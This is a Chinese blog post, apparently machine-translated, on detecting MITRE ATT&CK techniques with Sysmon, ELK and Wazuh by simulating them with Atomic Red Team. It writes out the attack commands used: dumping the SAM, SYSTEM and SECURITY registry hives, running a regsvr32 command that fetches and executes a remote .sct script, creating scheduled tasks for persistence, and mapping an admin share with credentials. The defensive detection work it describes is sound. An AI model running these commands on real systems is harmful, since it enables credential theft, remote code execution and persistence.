在端点上配置 Sysmon 后,ELK + Wazuh 协议栈将大大有助于执行威胁猎杀操作。
我们知道
本篇文章将重点介绍如何借助 Blue Team 的武器库 Sysmon 发挥检测能力。Blue Team 的经验法则是:组织存储的日志质量越高,检测就越容易。
要开始使用,需要使用以下开源工具:
- ELK
- Wazuh
- Sysmon -(配置文件:sysmon-modular)
- 原子红队(ART)
背景: Wazuh 是开源 HIDS,是 OSSEC 的分叉项目,具有 HIDS、检测 Rootkits、将端点日志传输到 SIEM 以增强安全分析的功能。它还具有文件完整性监控、漏洞检测、合规性解决方案等其他出色功能、
原子红队 (ART) 配备多种 MITRE 技术测试场景。ART 的覆盖范围如下
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/windows-index.md
在此,我们对以下技术进行了模拟测试,并可考虑在 SIEM 中编写相关逻辑规则。
- T1003 - 凭证转储
- T1037 - 登录脚本 && T1053 计划任务
- T1018 - 远程主机发现 && T1077 - Windows 管理共享
- T1117 - Regsvr32
好了 让我们实际操作一下,看看这些 MITRE 技术的结果如何 ?-?-?
- T1003 - 凭证转储
凭证转储是获取用户名、密码信息(明文/散列)、票据的过程,转储后攻击者将利用这些信息执行一系列活动,以实现其目标。
在 Windows 操作系统中,有多个区域可以存储或检索凭证。其中包括
- 萨姆
- LSA 秘密
- Lsass.exe 进程内存
- 服务原则名称 (SPN)
- 缓存证书
- 注册表文件
为了获取这些凭证信息,有确凿证据表明,对手过去曾在一系列入侵环境中使用过以下工具。
- 米米卡兹
- gsecdump
- 秘密转储
- Windows 证书编辑器
- Metasploit 模块
- Powersploit
- 帝国
让我们看看 SAM 转储在 SIEM 事件中是什么样子的--"SAM 转储"。
受害者机器上使用的命令
reg save HKLM\sam %temp%\sam
reg save HKLM\system %temp%\system
reg save HKLM\security %temp%\security
在 ELK 上收到的警报
2. T1117 - Regsvr32
Regsvr32.exe 是一个命令行程序,用于在 Windows 系统上注册和取消注册对象链接和嵌入控件,包括动态链接库 (DLL)。Regsvr32.exe 可用于执行任意二进制文件。Regsvr32.exe 还可用于注册 COM 对象,以通过组件对象模型劫持建立持久性。
受害者机器上使用的命令 -
regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll
在 ELK 上收到的警报
3. T1037 - 登录脚本 && T1053 计划任务
受害者机器上使用的命令 -
schtasks /create /tn “T1037_OnLogon” /sc onlogon /tr “cmd.exe /c calc.exe”
schtasks /create /tn “T1037_OnStartup” /sc onstart /ru system /tr “cmd.exe /c calc.exe”
在 ELK 上收到的警报
4. T1018 - 远程主机发现 && T1077 - Windows 管理共享
受害者机器上使用的命令 -
cmd.exe /c “net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator”
在 ELK 上收到的警报
本文暂时没有评论,来添加一个吧(●'◡'●)